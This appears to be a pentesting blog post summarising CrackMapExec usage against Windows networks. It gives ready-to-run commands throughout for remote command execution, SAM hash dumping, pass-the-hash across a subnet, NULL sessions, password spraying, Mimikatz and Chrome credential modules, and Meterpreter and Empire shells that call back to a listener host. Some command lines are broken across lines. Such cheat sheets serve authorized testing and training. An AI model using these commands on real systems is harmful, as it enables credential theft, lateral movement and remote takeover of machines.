Gather Your Tools
First off, be a smart hacker and know how to find great online materials, like this how-to:
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
And this excellent tute on CrackMapExec:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
For the TL;DR of that page, start in Bash:
# get syntax and details python crackmapexec.py # network enumeration python crackmapexec.py 192.168.1.0/24
Executing Commands
Note that if you run a command, you’ll need appropriate permissions. This will show up as (Pwn3d!) during execution.
CME has three execution modes
wmiexec executes commands via WMI
atexec executes commands by scheduling a task with windows task scheduler
smbexec executes commands by creating and running a service
Force CME to use only one execution method using the –exec-method flag.
Executing commands
Execute whoami on the target using the -x flag:
crackmapexec 192.168.1.11 -u Administrator -p 'password' -x whoami
Directly execute PowerShell commands with the -X flag:
crackmapexec 192.168.1.11 -u Administrator -p 'password' -X '$PSVersionTable'
Check for logged in users
crackmapexec 192.168.1.11 -u 'Administrator' -p 'password
' --lusers
Credential Attacks
Dumping the local SAM hashes
crackmapexec 192.168.1.11 -u 'Administrator' -p 'password
' --local-auth --sam
Authenticating via SMB using Pass-The-Hash attack uses the -H flag:
crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH
crackmapexec smb <target(s)> -u username -H NTHASH
Pass-the-Hash against a subnet
Login to every host on the subnet using smb with admin + hash. Use –local-auth and a local admin password.
cme smb 192.168.1.0/24 -u administrator -H 'aabbb435cc1404eeaa35b51404ee:dd09de4ff0aeee8d9f4a61100e51
NULL Sessions
CME and even the net command let you log in as nobody: a NULL Session.
crackmapexec smb <target(s)> -u '' -p ''
# or
net use \\192.168.1.11\ipc$ "" /user:""
(See this short article for more uses of NULL Sessions:
http://smallvoid.com/article/winnt-null-session.html.)
Brute Forcing & Password Spraying
Point crackmapexec at the subnet and pass the creds.
Using SMB
crackmapexec 192.168.1.0/24 -u Administrator -p password
However, check the account lockout policy first, so you know how slow you have to go:
crackmapexec 192.168.1.0/24 -u Administrator -p password
--pass-pol
Look for the number of tries you’re allowed. If there’s no limit, crack away!
Specify a value, a file or multiple values and CME will brute-force logins for all targets using the specified protocol (wmi, at or smb):
crackmapexec smb 192.168.1.1-100
-u username1 -p password1 password2
crackmapexec wmi 192.168.1.1
> -u username1 username2 -p password1
crackmapexec at 192.168.1.0/24
-u ~/usernames -p ~/passwords
crackmapexec smb 192.168.1.1-25
,30-35 -u ~/usernames -H ~/ntlm_hashes
Modules
Using a module
Run cme <protocol> <target(s)> -M <module name>.
Run the SMB Mimikatz module
(This is going to CRASH LSASS!)
cmesmb <target(s)> -u Administrator -p 'password' -M mimikatz
View module options
cme <protocol> -M <module name> --options # to view module options
# for example:
cme smb -M mimikatz --options
Using Module Options
Module options are specified with the -o flag. All options are specified as KEY=value.
Example:
cme <protocol> <target(s)> -u Administrator -p 'password' -M mimikatz -o COMMAND='privilege::debug'
Modules – MimiKatz
cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M mimikatz
(This is a dangerous module, as it will crash LSASS and break login.)
Modules – Enum_Chrome
sudo cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M enum_chrome
Getting Shells with CrackMapExec
Metasploit
Metasploit Module – Metinject
Show Metinject options:
cme -M metinject --show-options
[*] metinject module options:
SMB to Meterpreter shell
sudo cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M met_inject -o LHOST=192.168.1.10 LPORT=5656
Password:
Empire
Start RESTful API:
empire --rest --user empireadmin --pass password
Launch an Empire listener waiting for the target:
cme 192.168.1.11 -u Administrator -p password --local-auth -M empire_exec -o LISTENER=MyCME
Double-Teaming with Empire and DeathStar
Okay, so CrackMapExec can deploy Empire agents to compromised machines. Now you can use DeathStar’s automation features. Use the empire_exec module, specify a listener for the Empire agents to use, and they all get deployed and activated at once. Any credentials you find can be imported into the CMD credential database.
cme smb ~/targets.txt id 1 -M empire_exec -o LISTENER=DeathStar
Once again this is a TL;DR from this detailed document:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
Check out his whole repository of great resources!